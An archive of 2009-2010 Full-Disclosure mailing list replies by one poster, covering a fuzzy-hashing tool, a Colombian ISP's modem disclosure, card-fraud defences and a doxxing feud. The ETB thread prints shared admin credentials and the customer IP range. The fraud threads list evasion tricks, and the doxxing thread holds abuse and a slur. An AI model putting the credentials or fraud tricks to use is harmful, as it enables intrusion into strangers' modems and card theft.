>>> Do you consider yourself as an oz XSS ninja ?
>>>
>>> Did your C.V. ended in the OWASP trash bin ?
>>>
>>> And how the fuck you came up with a nickname like that ?
>>>
>>>
>>>
>>> Let us know, we truly give a shit about your life, and xss.
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Tool] DeepToad 1.1.0

[T Biehn]

I can see what you're saying, it could be useful for finding
differences in different versions of the same binary but from what I
can see Joxean's app is meant to group files of the same 'type,' not
provide 'diff' capabilities.

-Travis

On Tue, Jan 5, 2010 at 9:51 AM, Dan Kaminsky  wrote:
> I looked into a fair amount of this sort of normalization back when I was
> playing with dotplots.  The idea was to upgrade from simple Levenshtein
> string comparison (with no knowledge of variable length x86 instructions,
> pointers that shift from compile to compile, etc) to something with at least
> some domain specific knowledge.  What I found, somewhat surprisingly, was
> that dumb string comparison was more than enough.  In fact, when I compared
> pre-patch and post-patch builds, it was easy to directly see when content
> was added, removed, shifted in location, etc.  Joxean's going to have much
> the same result -- as basic as his similarity metric is, he'll get the broad
> strokes just fine.
>
> Ultimately the best approach is to build a graph of how functions interact
> and measure graph isomorphism, but of course Halvar figured that out years
> ago :)
>
> On Tue, Jan 5, 2010 at 3:41 PM, T Biehn  wrote:
>>
>> Hmm,
>> Wouldn't it be more useful to the sec community to have a algorithm
>> that abstracts at the -interpreted- content level? That is when
>> analyzing binaries I wouldn't think that this would classify two with
>> near identical functionality together, even though it is removing a
>> significant chunk of information during the hash pass.
>>
>> I would largely assume that your algorithm, as is, works best on
>> uncompressed bitmaps. Is there something I'm missing?
>>
>> -Travis
>>
>> On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret  wrote:
>> > Hi all,
>> >
>> > I'm happy to announce the very first public release of the open source
>> > project DeepToad, a tool for computing fuzzy hashes from files.
>> >
>> > DeepToad can generate signatures, clusterize files and/or directories
>> > and compare them. It's inspired in the very good tool ssdeep [1] and, in
>> > fact, both projects are very similar.
>> >
>> > The complete project is written in pure python and is distributed under
>> > the LGPL license [2].
>> >
>> > Links:
>> > Project's Web Page http://code.google.com/p/deeptoad/
>> > Download Web Page http://code.google.com/p/deeptoad/downloads/list
>> > Wiki http://code.google.com/p/deeptoad/w/list
>> >
>> > References:
>> > [1] http://ssdeep.sourceforge.net/
>> > [2] http://www.gnu.org/licenses/lgpl.html
>> >
>> > Regards && Happy new year!
>> > Joxean Koret
>> >
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MouseOverJacking attacks

[T Biehn]

Hey MustLive!
If you read the HTML specification you can find all sorts of XSS
attack vectors that people just assumed would be redundant to write
entire articles on!

Here!
http://www.w3.org/TR/REC-html40/interact/scripts.html

-Travis

On Sun, Jan 3, 2010 at 10:29 PM, Jeff Williams  wrote:
> Thanks for your wishes MustDie;
>
> Do you consider yourself as an oz XSS ninja ?
>
> Did your C.V. ended in the OWASP trash bin ?
>
> And how the fuck you came up with a nickname like that ?
>
>
>
> Let us know, we truly give a shit about your life, and xss.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Tool] DeepToad 1.1.0

[T Biehn]

Hmm,
Wouldn't it be more useful to the sec community to have a algorithm
that abstracts at the -interpreted- content level? That is when
analyzing binaries I wouldn't think that this would classify two with
near identical functionality together, even though it is removing a
significant chunk of information during the hash pass.

I would largely assume that your algorithm, as is, works best on
uncompressed bitmaps. Is there something I'm missing?

-Travis

On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret  wrote:
> Hi all,
>
> I'm happy to announce the very first public release of the open source
> project DeepToad, a tool for computing fuzzy hashes from files.
>
> DeepToad can generate signatures, clusterize files and/or directories
> and compare them. It's inspired in the very good tool ssdeep [1] and, in
> fact, both projects are very similar.
>
> The complete project is written in pure python and is distributed under
> the LGPL license [2].
>
> Links:
> Project's Web Page http://code.google.com/p/deeptoad/
> Download Web Page http://code.google.com/p/deeptoad/downloads/list
> Wiki http://code.google.com/p/deeptoad/w/list
>
> References:
> [1] http://ssdeep.sourceforge.net/
> [2] http://www.gnu.org/licenses/lgpl.html
>
> Regards && Happy new year!
> Joxean Koret
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security hole on local ISP

[T Biehn]

This is a hiroshima versus 'harmless' mountain demonstration debate,
Lee. Because the post includes the raw data including ports, passwords
and ranges one must assume that "Cilia Pretel Gallo" was appealing to
the lowest common denominator, to a group of individuals where
checking NRO whois db for ETB's netblocks would not be an obvious
first step.

Ahem.

-Travis

On Tue, Dec 29, 2009 at 11:36 AM, Lee  wrote:
> On Tue, Dec 29, 2009 at 10:23 AM, T Biehn  wrote:
>>
>> This is an orgiastic dump of information, you must really hate ETB; or
>> you must be really excited for lulz.
>
> or you're hoping that full disclosure will get ETB to fix the problem.
>
> Regard,
> Lee
>
>>
>> -Travis
>>
>> On Tue, Dec 29, 2009 at 5:23 AM, Cilia Pretel Gallo
>>  wrote:
>> > I've recently discovered a security hole on the modems (which double as
>> > routers) used by a Colombian ISP - ETB.
>> >
>> > It so happens that all incoming connections to an IP address on said ISP
>> > on port 23 or port 80 land on the modem instead of the computer(s) 
>> > connected
>> > to it. Even if one tries to redirect those ports to a local machine, the
>> > modem still gets all the connections on those ports.
>> > Also, connections on ports 23 and 80, from any IP address, will access
>> > the modem configuration options. Last year that could be done only from
>> > private IP addresses (i.e. 192.168.0/24), but now it can be done, as I 
>> > said,
>> > from anywhere. I've been told that a few lucky users were able to forward
>> > port 80, but in that case, it's port 8080 that is intercepted by the modem.
>> > The end result is that anyone, from anywhere, can access the modem of
>> > anyone on ETB to mess up their configuration (e.g. obtaining and changing
>> > the client's username and password, permanently disconnecting them from the
>> > internet, and so on) - that is, if they have the administration password.
>> > Unfortunately, ETB uses the same login/password on all of their modems 
>> > since
>> > 2006, which are publicly available on the web.
>> > Login: Administrator
>> > Password: soporteETB2006
>> >
>> > The whole IP range 190.24/14 corresponds to ETB clients. Any IP on that
>> > range where ports 80 and 23 are open is most likely a wide open ETB modem.
>> >
>> > Apparently, this issue has been repeatedly reported to ETB, but it
>> > always falls on deaf ears. They seem to think this is no big deal since
>> > nobody knows the username and password for the modems - which is not the
>> > case, and even if it were, they would be easily crackable by brute force.
>> >
>> > Peace,
>> >
>> > -Cilia
>> >
>> >
>> >
>> >
>> >  
>> > ¡Obtén la mejor experiencia en la web!
>> > Descarga gratis el nuevo Internet Explorer 8.
>> > http://downloads.yahoo.com/ieak8/?l=e1
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security hole on local ISP

[T Biehn]

This is an orgiastic dump of information, you must really hate ETB; or
you must be really excited for lulz.

-Travis

On Tue, Dec 29, 2009 at 5:23 AM, Cilia Pretel Gallo
 wrote:
> I've recently discovered a security hole on the modems (which double as 
> routers) used by a Colombian ISP - ETB.
>
> It so happens that all incoming connections to an IP address on said ISP on 
> port 23 or port 80 land on the modem instead of the computer(s) connected to 
> it. Even if one tries to redirect those ports to a local machine, the modem 
> still gets all the connections on those ports.
> Also, connections on ports 23 and 80, from any IP address, will access the 
> modem configuration options. Last year that could be done only from private 
> IP addresses (i.e. 192.168.0/24), but now it can be done, as I said, from 
> anywhere. I've been told that a few lucky users were able to forward port 80, 
> but in that case, it's port 8080 that is intercepted by the modem.
> The end result is that anyone, from anywhere, can access the modem of anyone 
> on ETB to mess up their configuration (e.g. obtaining and changing the 
> client's username and password, permanently disconnecting them from the 
> internet, and so on) - that is, if they have the administration password. 
> Unfortunately, ETB uses the same login/password on all of their modems since 
> 2006, which are publicly available on the web.
> Login: Administrator
> Password: soporteETB2006
>
> The whole IP range 190.24/14 corresponds to ETB clients. Any IP on that range 
> where ports 80 and 23 are open is most likely a wide open ETB modem.
>
> Apparently, this issue has been repeatedly reported to ETB, but it always 
> falls on deaf ears. They seem to think this is no big deal since nobody knows 
> the username and password for the modems - which is not the case, and even if 
> it were, they would be easily crackable by brute force.
>
> Peace,
>
> -Cilia
>
>
>
>      
> 
> ¡Obtén la mejor experiencia en la web!
> Descarga gratis el nuevo Internet Explorer 8.
> http://downloads.yahoo.com/ieak8/?l=e1
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Global warming - it's all about the money

[T Biehn]

There are no fundamental truths. That's the only axiom you can really
rely on. The acceptance of this fact is the first on the road to
enlightenment... or Schizophrenia.

Thats all for now, the suited men from a 1950's spy flick are watching
me from a vintage crown vic. Joke's on them, I've dressed my hair in
petroleum jelly.

-Travis

On Sat, Dec 19, 2009 at 4:57 PM, Stephen Mullins
 wrote:
>>...it's hard to know what's true in the comings and goings of men throughout 
>>the world
>
> Follow the money.
>
> On Tue, Dec 15, 2009 at 11:09 AM, Jared DeMott  
> wrote:
>> Paul Schmehl wrote:
>>> http://www.wnd.com/index.php?fa=PAGE.view&pageId=118953
>>>
>>> Businesses hold world hostage over carbon credits
>>> Even U.N. climate chief tied to new, 'green' extortion scam
>>>
>>> It was never about the climate.
>>>
>>
>> Not sure about all that, but it is sad that it's hard to know what's
>> true in the comings and goings of men throughout the world.  Fortunately
>> there are fundamental Truths you can hang your hat on. ;)
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v]

[T Biehn]

Any hexadecimally represented 16 bytes is obviously an MD5.
For those interested in finding signal where there is none:
LM hashes are 16 bytes, but are actually two concatenated 8 byte DES hashes.

On Tue, Dec 1, 2009 at 2:52 PM, McGhee, Eddie  wrote:
> N3td3v i am Scottish and coming for you're boxes
>
> In yer area wee man. Fjeer.
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of genesis 
> project
> Sent: 01 December 2009 19:47
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v]
>
> BEGIN TRANSMISSION
>
> 7040dc5b9583e367068a06f25a7bce8a
> 93e085c3571947bb935af4c8e62df42e
> bd9859da693421728921176693226dbb
> 27d4a0a73b79efc8f229e709bf9c5858
> b49b4e3ece77173db3a3ce246f31ba56
> bfca9db2ba007b1c44e5fca8b8f05a0e
> 0da3451c72565616d07010df1b241737
> 0a6857b1895b228050776841b32affd6
> 4f47f89f28926ef6ea7300537664cbe4
> 760cebf1739ed06bb89f20ab3eb2f811
> d3f949c42963ad5d5628bfdf75c374e3
> 93be00d1f1f8699f11a196c5d331d03a
> 1787abb29dc4727cc16b3fee8a2e92cb
> 6282f38dc06e7932c4f4b3c848d71e08
> 6ba17f76a3b93f26a42abaa1e631c0e3
> 39784740bbf93b2b83b0c58403943ee8
> b5bf1ef91072822b2675945d4fc3bc59
> d38bac3fcaedaed11fb3f1273248fbe0
> e1315c4290e7af09ad8532f40842ab21
> 958ace1fe31a29df9e0ae7def01a72e9
> 1ea95dfa189f03e723d800a14740197c
> 987205d906e98d1e23c46659bfeb389a
> 5286827e25643a66b0d4823ee492004a
> 2481d318d6ea2ea2af10af64d2203ac6
> 02a3c07ae1f9662d4375d6586e6cce97
> b7095f8e8a4e0a4bbc1155ef2c495b4f
> af671a4192a4ac0732da175185cb690c
> e5a48398e8bf9a9fe274421ea48e532d
> e95961cf8f47623bab5e3be8541c7aea
> b8f76f41598302462affd1fb917818b3
> df89576229f264ae2c7aebd92f3eb5c1
> ee6271d6d6f4dadd9d93f265446898d7
> 76763d316ec90789ae9ed3bda0f260b0
> fd945157f527a52ce78b37a662ba3ae2
> 65845c483be88ac1b5be34cb4a39a062
> b30f718f101a3967e471ae8827e8e2f2
> 3ad2e2f177788d06b6ddedf01d641864
> c19975a84d2915d7de2e5aaca973aff3
> 268cbcea00e2ac78f497e3c40b5d6d16
> baa6552f904cfe608733a290fb3b0348
> 8cef9785397784af320aad64d4a451fa
> 1185b5a82873f3b6a7af2e80b7000819
> 3a4af85f5803b75265e9d8483b311858
> 8d5ab13bf268d5af676f8d21b6463088
> 2a1c3be1c1fea0bb80a1242732f52003
> 1a052508cb706d60f970fc0b31929e2d
> 5c2a7806346bcd89a24678fa0e556b24
> c34ea7f66d8adda39ab4d31a293944c5
> 2dfb7c91e7debc2c47028abba9878b8e
> a83842d1970b8b9361b28994bdea133e
> 9988fe16e6783b97f30dae9879b43108
> f7c2adcf3501371516b5cd7c41afade0
> 3f92a19b63644fab656f38413ab99f49
> bc3afe9ce52461a1a48203ad832b04da
> dca51c6e633166ad7361086ae604bc9e
> 3f02d51fa412af42fc8569a416a992b8
> 342c8599434faee181456f5ba1ecb89c
> 936f1f7c562f1d62383981f727770724
> 5e99612e8301260b3fe3f4310b301d69
> dd5810c0a8b60b34c423dee8383323bc
> 001ebe4cfff9e32ef4ee19137485a2cd
> 8f5b148e2c3edcfc82f6b225a8642383
> ca00bd55ba0164405edd8965f0f527be
> 83b70c007d10927fce8be15cd387e19f
> 10248928399d1a23d543a12fa2ce55f3
> 597e73653a1798f6c7ae859e6bcbb0af
> 50f6f302cdf09f97c35feb22353b7df5
> f726a9833d6cb765241f5b5407c75aff
> 958ace1fe31a29df8b8df3134373bee0
> 1f6a7b08e47d947e0e5641802c9e4af6
> 666925ac26c0df66038ec6a2b05df1ff
> 6d3f62a326e6685a505463353c8f5dc3
> 58d29e01339ce1ebc04db879e36be2a1
> f089a9ab5b3404d9e2dd14857a49fc15
> cd7545c0c1c0ccaa220b8eb542a50a09
> b984f08075ac64b29d0e0f06fbae8427
> b2daa21b13c410b5265d2e4398365f2b
> f8b6f1db0c9b44adf497e3c40b5d6d16
> e0603724697cc1c0c119adf3c4c2fbc3
> 3ddf0c148fee11380606ca727bc419e7
> 41e6e4a81e4e27411eee1fe5f0da834b
> 81079622b23ce42817262bbbdcde38c9
> 209d1e47a7bcb71d813b58bf4809881e
> 1488a239d560d41d987af10a94a1ecab
> fe20ecdaf9c90ec04ce346d85aed6d91
> c32ee9c5be9c64cecef763decfad4dca
> 2907176aac354b46ebfec5d51a3f5294
> cb53a79af06450347c2f041f78c73aa9
> a3ecabc26e17d9213f92a19b63644fab
> 79ba44f07337f89707282e178959d582
> 3915966def8d5939b3dcaa99a0f63dfb
> 55ef531b7722a7f847183bb5cd62b448
> 2cbd414bdf1769637f121cafb1a4e42c
> 3f92a19b63644fab686ef611d64d4641
> 93bde960aca5996742dcf0680fee7558
> 9c3d2204d817bd95bbc5031eb85239a4
> ad3b70730307b0924c3caf13dc6696fb
> de091866bed93da6582cbff43b18ad70
> 34c370a3e5eefb81290eebf586d15184
> 2871985cdc38e885b16836e8598f98c3
> 3aa1f46ba0b2e10ff1fe16987ab96eea
> f4894f0f34ab1e64d7461fb1bf45342f
> e221c95c7502b1d1a8a3cdc2cf7bd7aa
> 2012c9af47d83a325e1d0ccff62e6f64
> 654f6e35ce564578b242ade81f1a56ef
> 3bc2d195600ec07a0e16b72f946bcb5d
> 16f5408569724cd19b6bd8deb9070a7e
> e52e66188a45d27c4b6dc31ae3b202df
> c218181a6b95baf8c9331e3d07d06dde
> 83b66338d7bb3f5e4065fb8fa70656ca
> 4a1b0b72f02795fa3f92a19b63644fab
> 0df1df0e0383002a5988938195dbb95f
> 2a98945ce29d90a761f21d49a9fcaaff
> aa69c6e314fe570da60f9889f9b3f5b7
> 0ef3c0e63d60af7bf7bdbad9a56f92c1
> e3304feb10c583e0414961201ead7711
> dc4bf95b9e80405f0e5baa8088f200da
> 20d77139485e7dcb6f6802b339a56f44
> a3bbcef064dcc7b317ee3b975ef28472
> 76561a553f3dd6908aa898fb892c4238
> 8853bd85b9c969c0bb0deabf92b01aab
> 35ba007891228128afdcaeaf3c75f4e7
> 955b6f31ad3bef73f204e86b358dc297
> ea0ec008244731b

Re: [Full-disclosure] when I grow up

[T Biehn]

VK, obviously you don't own the account you have them send the money to.
You just happen to have an 'entangled' ATM card.

-Travis

On Tue, Oct 6, 2009 at 11:00 AM,   wrote:
> On Tue, 06 Oct 2009 10:46:19 EDT, T Biehn said:
>> Can't you make a good hunk of low-risk cash by 'pretending' to be a
>> money mule? (Profile: 20s, looking for 'easy' work.)
>
> Stealing from the old Mafia wasn't so bad.  If you got caught, it was
> usually "just business" and they dispatched you in the most economical
> way feasible.
>
> These days, the field is dominated by crazy and rutheless South American drug
> cartels, ruthless and crazy Asian Yakuza-like gangs, and *really* crazy,
> ruthless, psycopathic gangs from the Ukraine.
>
> Low risk? Hardly.
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] when I grow up

[T Biehn]

Can't you make a good hunk of low-risk cash by 'pretending' to be a
money mule? (Profile: 20s, looking for 'easy' work.)

-Travis

On Tue, Oct 6, 2009 at 8:40 AM, RandallM  wrote:
> ...when I grow up Daddy, I want to be a Money Mule!
>
> --
> been great, thanks
> a.k.a System
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Chargebacks and credit card frauds

[T Biehn]

Prepaids can be had in the US and Canada sans ID. Fake IDs cheap, easy to get.

DIDs are cheap, usually free.

How many of those nett'd households have VoIP phone service? Hijack
inbounds for re-routing to your own (free) SIP server provider?

Implementing some sort of automated call verification service is expensive, CBA?

Credit cards are insecure, you're playing cat and mouse games until
your checks become too invasive for end consumers. Perhaps you insist
on a verifying payment gateway and flag all other transactions for
manual processing in addition to adding new lists for IP checks.

Glorious,

-Travis

On Wed, Sep 23, 2009 at 11:47 AM, Anıl Kurmuş  wrote:
> As others have mentioned, you have to assume the machines are
> compromised. This means you should use another channel for
> authorization of each transaction (depending on the use of your
> website,  only authenticating the user through this channel could be
> enough but this is more risky and vulnerable).
>
> I would say the most cost effective one is probably to use SMS/cell
> phones.  You would send an SMS with the transaction details and a
> verification code to be entered on the website for finalizing the
> transaction. If the state/country given by the phone number doesn't
> match the billing address, you throw a red flag as you did before.
>
> So if an adversary wanted to cheat, he would need to enter a cell
> phone from the same region/country. Assuming he can find infested
> machines in the same country, this is not really difficult, still it's
> new and makes it harder. Of course, the main advantage is that in many
> countries, it's not easy nowadays to get a prepaid cell phone without
> giving any IDs for instance, so this might act as a deterrent. A
> better (but more expensive and slower) solution though would be to
> authenticate the cell phone number through postal mail at setup
> time/when changing the cell number.
>
>
> Anıl Kurmuş
> ---
> GPG Key :
> http://perso.telecom-paristech.fr/~kurmus/key
>
>
>
> On Tue, Sep 22, 2009 at 06:26, Steven Anders  wrote:
>> Hi everyone,
>>
>>   I work as an engineer at an online company that sells online subscription
>> service for online tool. We accept orders online using credit cards numbers
>> and we use Authorize.net to process credit card payments.
>>
>> Our standard operating procedure for online orders are: normal checks are
>> check for billing address and IP address ,  - we make sure the billing
>> address is a match and the IP address geo location is good (meaning, it is
>> pretty close to the billing city or state). We use a service called MaxMind
>> and we check to make sure that the IP address geo location is in proximity
>> to the billing address. From our experience, another big red flag is if the
>> IP is from a proxy server, or from web hosting company (could be SSH
>> tunnelling), or outside USA ( Russia, Estonia, China, etc )
>>
>>  If these checks throw a red flag, we will call the person to confirm the
>> order. With this process, we pretty much has very low fraud rate.
>>
>>   Lately, in past couple months, we've been receiving a lot of orders that
>> bypass all these checks without any glitch. The AVS (Address verification
>> service pass) checks for the billing addresses and the IP addresses are good
>> (in proximity to the billing address). The IP addresses are near the billing
>> addresses (for example: billing address is Chicago, IL and the IP address is
>> Evanston, IL - a couple miles from Chicago).
>>
>> Only a few weeks later, we have an influx of chargebacks and phone calls
>> from the original owners of the credit cards, since these people never
>> ordered it - and they are all fraudulent orders.  The only similar patterns
>> in all these orders is that:
>>   1)  they use free email accounts (from Yahoo , Hotmail, etc) .
>>   2) All the IPs are from ISPs such as Sbcglobal, Comcast, Cox
>> Communications, etc .
>>
>>   My big question is: I know there are all kinds of ways people could obtain
>> stolen credit card numbers, and their billing addresses, and so forth.
>>
>>  But. I was wondering:
>>
>> 1. how do they place the orders using all the legit IPs - since all the IPs
>> are from Sbcglobal  , Cox communications,  and all the other major ISPs near
>> the billing addresses.  Could it be that they actually took control of the
>> PCs and then steal the credit card, and then place the order remotely from
>> the controlled PC?
>>
>> 2. Any insights on how these fraudsters obtain the stolen credit card
>> numbers?
>>
>> I am now tasked with improving our backend checks to make sure we don't have
>> any more fraudulent order, and would appreciate any pointer or insights into
>> this matter. Any theories, insights, or information would be very useful.
>>
>> Thank you all for your time in advance.
>> steve
>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosu

Re: [Full-disclosure] Chargebacks and credit card frauds

[T Biehn]

You could run IP against spam bl's, ISC lookup, dronebl, proxybl for flagging.

-Travis

On Tue, Sep 22, 2009 at 2:36 PM, Steven Anders  wrote:
> Thanks Andrew for the suggestion.
> Yes, it does make sense to do all the checks you described. These days, as
> manual process, we just make a phone call and do a follow-up email.
> We ask for a copy of the credit card to be faxed and a proof of ID. Many
> times the fraudsters do a reply with very "bad English"  - sometimes it is
> funny.
> And you're right - a lot of the orders are placed on non working hours.
>
>
> On Mon, Sep 21, 2009 at 10:29 PM, Andrew Haninger 
> wrote:
>>
>> On Tue, Sep 22, 2009 at 12:26 AM, Steven Anders 
>> wrote:
>> > I am now tasked with improving our backend checks to make sure we don't
>> > have
>> > any more fraudulent order, and would appreciate any pointer or insights
>> > into
>> > this matter. Any theories, insights, or information would be very
>> > useful.
>> I have three ideas. Two are quite complicated and the other a little
>> simpler. None are fraud-proof. Some may be impractical if your work is
>> being done "after the fact".
>>
>> 1) Have a robot call or text the customer a CAPTCHA-type string to
>> enter into a website.
>>
>> Workaround: Register a cell phone or VoIP number in the victim's area
>> code and take the call. You could possibly require a hard-wire
>> landline, but those are becoming so uncommon that it would create
>> trouble for many of your customers. And then there are those darned
>> dialup users.
>>
>> Perhaps do this only after a first "offense". Though, I'm guessing
>> fraudsters only use the accounts once and then avoid them.
>>
>> 2) Have a Flash or Java applet check for common remote desktop servers
>> running on the ordering PC.
>>
>> Workaround: Disguise the server software as something harmless, if it
>> isn't already.
>>
>> 3) Check to see if the order was placed outside normal waking hours or
>> during normal working hours.
>>
>> Workaround: Not hard to work around, but might hassle the criminals.
>>
>> Andy
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

[T Biehn]

Mapping weev->IRL has no real impact, as he has either an entirely
different identity or a DBA, if this was a fictional account on weev's
part it would be certainly easy, effective, and feasible for him to
change a single letter in his name.

For the next part, you might want to grab some calming tea or something...

If you've achieved anything it's angering his online persona, these
typically only become a bit more malicious and difficult to catch.
You've succeeded only in creating an even larger 'weev.'
Try posting a home address next time.
For bonus points engineer some sort of scheme where the hive becomes
enraged and R4L's him.
It's been done before, and will be done again by those with real 'talent.'

Given that weev has demonstrated competency in all the above I think
it prudent that you not associate this "disclosure" to any of your
other online identities. (Brag on IRC already? Who did you work with?
You seem to be somewhat close to weev, enough to have a personal
vendetta against him, do you know that everyone you've talked with
actually hates the guy enough not to drop your pseudonym?)

-Travis

On Wed, Sep 16, 2009 at 8:52 PM, zewbiec...@gmail.com
 wrote:
> what does google earth have to do with any of this?
>
> On 9/16/09, GOBBLES  wrote:
>> What do you mean Sherrod *was* a fed?
>>
>> Obviously the point wasn't to ruin. The point was to salt the earth by
>> filling google with your real name.
>>
>> I can now officially say the (Google) Earth has been salted for you. You'll
>> never be able to live a real life again. You'll always be hiding in the
>> shadows for the rest of your life now.
>>
>> In may not hit you now, but eventually you'll feeling suffering and despair.
>>
>> I'm the one who helped in the process of clipping your wings to keep your
>> grounded. To leave you in the world where mediocrity will never come.
>>
>> You are a monster for what you did to Kathy... She's a great UX designer and
>> a beautiful woman...
>>
>> Sincerely,
>>
>> Tim O'Reilly
>>
>> Btw all dogs go to heaven was awesome you fucking faggot
>>
>>  Original Message 
>> From: Andrew A 
>> To: GOBBLES 
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
>> Date: Tue, 15 Sep 2009 23:52:42 -0500
>>
